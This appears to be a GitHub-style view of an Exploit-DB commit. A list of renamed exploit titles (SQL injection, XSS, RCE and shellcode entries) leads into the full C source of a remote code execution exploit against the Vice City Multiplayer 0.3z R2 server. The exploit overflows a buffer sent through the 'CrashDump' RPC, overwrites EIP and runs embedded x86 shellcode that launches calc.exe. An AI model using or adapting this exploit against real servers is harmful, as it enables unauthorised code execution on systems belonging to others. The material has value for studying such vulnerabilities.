ed0e1e4d44
1979 changes to exploits/shellcodes Couchdb 1.5.0 - 'uuids' Denial of Service Apache CouchDB 1.5.0 - 'uuids' Denial of Service Beyond Remote 2.2.5.3 - Denial of Service (PoC) udisks2 2.8.0 - Denial of Service (PoC) Termite 3.4 - Denial of Service (PoC) SoftX FTP Client 3.3 - Denial of Service (PoC) Silverstripe 2.3.5 - Cross-Site Request Forgery / Open redirection SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection Silverstripe CMS 3.0.2 - Multiple Vulnerabilities SilverStripe CMS 3.0.2 - Multiple Vulnerabilities Silverstripe CMS 2.4 - File Renaming Security Bypass SilverStripe CMS 2.4 - File Renaming Security Bypass Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities SilverStripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities Silverstripe CMS 2.4.7 - 'install.php' PHP Code Injection SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection Silverstripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload SilverStripe CMS Pixlr Image Editor - 'upload.php' Arbitrary File Upload Silverstripe CMS 2.4.x - 'BackURL' Open Redirection SilverStripe CMS 2.4.x - 'BackURL' Open Redirection Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure SilverStripe CMS - 'MemberLoginForm.php' Information Disclosure Silverstripe CMS - Multiple HTML Injection Vulnerabilities SilverStripe CMS - Multiple HTML Injection Vulnerabilities Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation Monstra CMS before 3.0.4 - Cross-Site Scripting Monstra CMS < 3.0.4 - Cross-Site Scripting (2) Monstra CMS < 3.0.4 - Cross-Site Scripting Monstra CMS < 3.0.4 - Cross-Site Scripting (1) Navigate CMS 2.8 - Cross-Site Scripting Collectric CMU 1.0 - 'lang' SQL injection Joomla! Component CW Article Attachments 1.0.6 - 'id' SQL Injection LG SuperSign EZ CMS 2.5 - Remote Code Execution MyBB Visual Editor 1.8.18 - Cross-Site Scripting Joomla! Component AMGallery 1.2.3 - 'filter_category_id' SQL Injection Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection RICOH Aficio MP 301 Printer - Cross-Site Scripting Joomla! Component Auction Factory 4.5.5 - 'filter_order' SQL Injection RICOH MP C6003 Printer - Cross-Site Scripting Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes) Linux/ARM - sigaction() Based Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (52 Bytes)
140 lines
No EOL
3 KiB
C
140 lines
No EOL
3 KiB
C
/*
|
|
Exploit Title: Vice City Multiplayer remote code execution (Server)
|
|
Date: 22/08/2012
|
|
Exploit Author: Sasuke78200 (Benjaa Toufik)
|
|
Software Link:
|
|
http://www.vicecitymultiplayer.com/downloads/03z_r2/server0.3zr2(pawn)(win)(updated2).zip
|
|
Version: 0.3z R2
|
|
Tested on: Windows XP SP3, Windows 7 Ultimate SP1, Windows Server 2003,
|
|
Windows Server 2008, it should work on all Windows.
|
|
|
|
Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20758.tar.gz
|
|
*/
|
|
|
|
#include "main.h"
|
|
|
|
/*
|
|
Written by Sasuke78200
|
|
http://sasuke78200.blogspot.fr/
|
|
|
|
*/
|
|
|
|
|
|
RakClientInterface* pClientInterface;
|
|
|
|
|
|
void Exploit()
|
|
{
|
|
unsigned long iLen;
|
|
unsigned char aBuffer[4096];
|
|
RakNet::BitStream* pBitStream;
|
|
|
|
unsigned char aShellCode[] =
|
|
{
|
|
0xE8, 0x25, 0x00, 0x00, 0x00, 0x5B, 0x81, 0xEC,
|
|
0x80, 0x00, 0x00, 0x00, 0x6A, 0x01, 0x6A, 0x00,
|
|
0x6A, 0x00, 0x53, 0x68, 0x78, 0x82, 0x44, 0x00,
|
|
0x6A, 0x00, 0xB8, 0x94, 0x61, 0x44, 0x00, 0xFF,
|
|
0x10, 0x6A, 0x00, 0xB8, 0x00, 0x61, 0x44, 0x00,
|
|
0xFF, 0x10, 0xE8, 0xD6, 0xFF, 0xFF, 0xFF, 0x63,
|
|
0x61, 0x6C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00
|
|
/* Compiled version of */
|
|
//USE32
|
|
|
|
//_start:
|
|
// call _string
|
|
|
|
//_begin:
|
|
// pop ebx
|
|
// sub esp, 0x80
|
|
|
|
// ; ShellExecuteA(0, "open", "calc.exe", 0, 0, SW_SHOWNORMAL);
|
|
// push 1
|
|
// push 0
|
|
// push 0
|
|
// push ebx
|
|
// push 0x448278 ; offset of "open" on the server
|
|
// push 0x00
|
|
// mov eax, 0x446194
|
|
// call [eax]
|
|
|
|
// ; ExitProcess(0); To avoid a crash
|
|
// push 0
|
|
// mov eax, 0x446100
|
|
// call [eax]
|
|
|
|
//_string:
|
|
// call _begin
|
|
// db "calc.exe"
|
|
// db 0
|
|
};
|
|
|
|
pBitStream = new RakNet::BitStream();
|
|
|
|
memset(aBuffer, 0x49, sizeof(aBuffer));
|
|
|
|
iLen = 588; // limit of the stack on Windows
|
|
|
|
// New EIP (stack pointer)
|
|
|
|
*(unsigned long*)&aBuffer[iLen] = 0x4165E6; // Windows
|
|
iLen += 4; // EIP
|
|
*(unsigned long*)&aBuffer[iLen] = 0x90909090;
|
|
iLen += 4;
|
|
memcpy(&aBuffer[iLen], aShellCode, sizeof(aShellCode));
|
|
iLen += sizeof(aShellCode);
|
|
|
|
|
|
|
|
pBitStream->Write((unsigned int)iLen);
|
|
pBitStream->Write((char*)aBuffer, iLen);
|
|
|
|
|
|
pClientInterface->RPC("CrashDump", pBitStream, HIGH_PRIORITY, RELIABLE, 0, false, UNASSIGNED_NETWORK_ID, 0);
|
|
delete pBitStream;
|
|
}
|
|
|
|
int main()
|
|
{
|
|
|
|
Packet* pPacket;
|
|
|
|
pClientInterface = RakNetworkFactory::GetRakClientInterface();
|
|
pClientInterface->Connect("127.0.0.1", 5192, 0, 0, 20);
|
|
|
|
|
|
for(;;)
|
|
{
|
|
while((pPacket = pClientInterface->Receive()) != 0)
|
|
{
|
|
switch(pPacket->data[0])
|
|
{
|
|
case ID_CONNECTION_REQUEST_ACCEPTED:
|
|
{
|
|
puts("Connected ...");
|
|
Exploit();
|
|
break;
|
|
}
|
|
case ID_CONNECTION_LOST:
|
|
{
|
|
puts("Connection time out\nCode executed ? :)");
|
|
break;
|
|
}
|
|
case ID_RECEIVED_STATIC_DATA:
|
|
{
|
|
break;
|
|
}
|
|
default:
|
|
{
|
|
printf("packet id %d received lenght %d bytes\n", pPacket->data[0], pPacket->length);
|
|
}
|
|
}
|
|
|
|
pClientInterface->DeallocatePacket(pPacket);
|
|
}
|
|
|
|
|
|
}
|
|
|
|
return 0;
|
|
} |